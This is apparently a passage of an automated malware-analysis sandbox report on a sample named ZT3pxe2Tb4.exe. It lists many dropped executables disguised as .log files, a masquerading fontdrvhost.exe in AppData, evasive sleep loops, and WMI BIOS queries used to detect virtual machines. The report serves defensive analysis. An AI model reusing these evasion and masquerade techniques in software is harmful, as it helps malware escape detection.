Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RMCoLrQk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uRiBlhjd.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qxbJOXLg.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PCgnLZlk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CGTrJaEm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YMjefUJa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hRSCUTxn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CgRzmzKC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HuSZzPsz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LovAYRCw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\inkviYhq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pzYaRqdW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\piqUgtXk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hJcmyZDP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QkEpPQey.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eCwwaQCH.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tAOrkGQb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qiKKKJQB.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lThKWNPp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cnAeDqUL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ELDRalsN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oTDkKMId.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ipFMCTyG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IdUqmnRm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DACRVJoK.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IbKgwPay.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\avWEvUWS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ldamqVhj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YsHvxEyH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KWVhlfdm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aABfDneW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YnJNkaiG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KOmOGvDg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zldaSYtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FvSbvlyH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mbeUnBPt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MLVQXpXH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NmOPODYO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JavyIngh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YBjETBXN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pntLeisv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KszgdGmQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aLYWFcdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fuaVjmBB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pMKkuPam.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VPWFywnw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JvAHRkKP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XzKOkXsR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VWGgLdif.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YVGePHcW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DQsQlVoZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HlvZPcYC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lCADkPID.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CTQIQVae.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GspafaHt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CdkYHFFH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RraOLYZw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TORFqFIZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TWBYVoif.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zntiAIEO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dbVNVLdb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\maCuLVwe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wOXBumXW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RRcFiATg.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\THFECrua.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TlbPEPXm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rrvChBIx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GGiHtSpS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZbufrXkm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qguCdZEu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dabMNWxu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ouGCZwUD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DEcjsSrF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cixmEAyA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MTLhtkSf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DdBAnNSZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UOaorzbP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xgyKnYKq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gmudUmpb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PwAgeDiA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OnJqPAWm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QfCxRbIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NMMXsbef.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rmtKjMmm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MPlPWbPk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RMaOjKxV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AFOsBjYP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OjpXkDnJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XEIwxBIS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MHvzAhUM.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rAfUMkjC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oQWKeSDj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WYfWtHNc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RCCOzYeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GPSaXBQY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HxFJRUCD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iJlVzTXF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ifAdEpGk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IHwzgXOR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\COTaDrJc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kdNuDPIk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pJXAdKPi.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xkYbKhNl.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xHZssejW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\phJkSByL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qiEMTywj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kMzdwiuP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lHCvjEeO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\blWejAjG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XzFFzMmI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NWMxEuQr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mCNvXUiC.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XFfNnXVZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZklVGaxA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FWzHsBqG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OEWHVhjH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NgoGZspx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iANVPgEI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xvPIrmGV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nJvbxzCb.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tqrrAUxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PEqxAxdY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JAxqeOaQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OemrfNDp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TCIWpNeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IiRYzRio.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YUSxJEkf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zfzIrCEh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SbqYhYfr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SdGfOIqy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TYRgCYum.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LtTWIWgh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aVjDvRpd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MMDorhKp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JfyqGcCs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WgOpYqoh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KjbhtTTT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kQZvTrxL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ylQifTUJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aFyNQRuY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sihlzJJp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WzsNMHNJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uHokLZDZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zReaumVj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kUpuTdpn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uvZrYWTP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jECTfuuL.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DnshUSLJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ULtOMFWU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iKNvbzqU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\msUTDNPI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zsrQNmVQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uJzjHyIX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dKmMwLxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OzZYIDTF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fqGCEpSY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FWXhQVXq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QpCXcuuA.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SKewgrff.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sQxsIGwX.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wHLAFYKX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sXAbZyyE.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nHlSHaLn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fyqViYtd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sYhLnqXd.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XxwvJouT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KnZYovDz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zuGjoWSN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fvxnZIOH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\inpEUjnz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XsyMwKeS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mJblSiJK.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dpYUmTzI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OgxpbmIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rudcNvNr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wsOrhbIJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hsmnhNDB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZtZwWUdP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ORiFVhtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CQeYyQPa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zzDSBAiP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ikDUDecv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WuogHSdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YOQFKOOU.log Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7268 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5004 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7180 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7532 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7396 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7880 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8124 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 3512 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 6092 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7320 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8048 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7552 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 4628 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
